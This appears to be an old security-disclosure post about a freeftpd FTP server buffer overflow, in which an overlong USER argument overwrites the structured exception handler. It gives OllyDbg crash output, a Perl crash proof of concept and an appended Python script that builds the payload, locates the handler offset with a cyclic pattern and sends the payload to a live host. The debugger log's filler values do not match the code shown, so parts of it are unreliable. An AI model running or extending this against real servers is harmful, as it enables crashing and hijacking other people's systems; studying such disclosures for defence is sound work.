Hi,

While drooling over my new Adriana Lima wallpaper, my tongue accidentally hit my keyboard and more than 1012 chars were sent to the login screen of my freeftpd server (which I use to backup my Adriana Lima pics). Guess what... the server crashed! Luckily I attach ollydbg to every process I have running and this is what I found:

ECX 50505050

EIP 77C460CB msvcrt.77C460CB
Log data, item 0
 Address=77C460CB
 Message=Access violation when reading [50505050]

77C460CB   8B01             MOV EAX,DWORD PTR DS:[ECX]

Well, EIP doesn't get overwritten, but SEH does:

0012B6CC   41414141
0012B6D0   42424242
0012B6D4   42424242
0012B6D8   43434343  Pointer to next SEH record
0012B6DC   47464544  SE handler

EIP 47464544

Log data, item 0
 Address=47464544
 Message=Access violation when executing [47464544]

I leave the exploit coding as an exercise...

enjoy

sample crash code:

#!/usr/bin/perl -w
#freeftpd USER buffer overflow
#barabas - 2005

use strict;
use Net::FTP;

my $user = "\x41" x 1011;          # filler up to the SEH record
$user .= "\x44\x45\x46\x47";       # overwrite SE handler ("DEFG" -> 47464544 little-endian)
$user .= "\x50" x 400;             # tail; this is what lands in ECX (50505050)

my $ftp = Net::FTP->new("127.0.0.1", Debug => 1)
    or die "cannot connect: $@";
$ftp->login("$user", "whatevah");
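As an added example (this is not part of the original post or the freeftpd project), the same USER payload built in Python, together with the two dwords a debugger would show in the overwritten exception-registration record and a Metasploit-style cyclic pattern for finding the handler offset when the filler length is not yet known. The 1011-byte offset, the "DEFG" handler bytes and the 400-byte 'P' tail are the post's own numbers; the 0x47464544 value falls out of x86 little-endian ordering of "DEFG", and the next-record pointer is the dword immediately below the handler. `send_user` is an assumed helper built on ftplib and is only called when a host and port are passed on the command line.

```python
"""Added example: reproduce the freeftpd USER/SEH overwrite from the post
and map a crash dword back to its offset with a cyclic pattern."""
import string
import struct

# Numbers taken from the post's Perl PoC: 1011 filler bytes, "DEFG" over the
# SE handler slot, then 400 bytes of 'P' (the 0x50505050 seen in ECX).
SEH_OFFSET = 1011
SEH_BYTES = b"DEFG"
TAIL_LEN = 400


def build_user_payload(filler=b"A", seh=SEH_BYTES, offset=SEH_OFFSET, tail_len=TAIL_LEN):
    """USER argument laid out exactly as the post's Perl PoC builds it."""
    return filler * offset + seh + b"P" * tail_len


def dword_at(buf, offset):
    """The 4 bytes at offset read as a little-endian dword, i.e. what OllyDbg prints."""
    return struct.unpack("<I", buf[offset:offset + 4])[0]


def seh_view(payload, offset=SEH_OFFSET):
    """Both dwords of the overwritten _EXCEPTION_REGISTRATION record:
    next-record pointer sits 4 bytes below the handler pointer."""
    return {"next_seh": dword_at(payload, offset - 4),
            "handler": dword_at(payload, offset)}


def pattern_create(length):
    """Metasploit-style cyclic pattern: each Upper/lower/digit triplet appears
    once, so any aligned 4-byte window is unique (max 20280 bytes)."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("length exceeds the 20280-byte pattern space")


def pattern_offset(crash_dword, length=20280):
    """Given the dword the debugger showed in the SE handler (or EIP) after a
    pattern was sent, return its offset in the pattern, or -1 if not found."""
    needle = struct.pack("<I", crash_dword)  # bytes as they sat in memory
    return pattern_create(length).find(needle)


def send_user(host, port, user_bytes, timeout=5):
    """Deliver USER <payload> to a live target (network; not run at import).
    Assumption: the server consumes the argument as raw bytes, so latin-1 is
    used to push them through ftplib unchanged."""
    import ftplib
    ftp = ftplib.FTP()
    ftp.encoding = "latin-1"
    ftp.connect(host, port, timeout=timeout)
    try:
        return ftp.sendcmd("USER " + user_bytes.decode("latin-1"))
    finally:
        ftp.close()


if __name__ == "__main__":
    import sys
    payload = build_user_payload()
    view = seh_view(payload)
    print("SE handler <- 0x%08x, next SEH <- 0x%08x" % (view["handler"], view["next_seh"]))
    if len(sys.argv) == 3:
        # python seh_poc.py <host> <port>: send a pattern of the same length
        # instead of the fixed payload, then hand the crash dword to
        # pattern_offset() to recover the handler offset.
        print(send_user(sys.argv[1], int(sys.argv[2]), pattern_create(len(payload))))
```

With the fixed payload the handler dword comes out as 0x47464544, matching the post's crash log; with the pattern variant, the dword OllyDbg shows in the SE handler slot is fed to `pattern_offset` and should return 1011 if the overflow behaves as described.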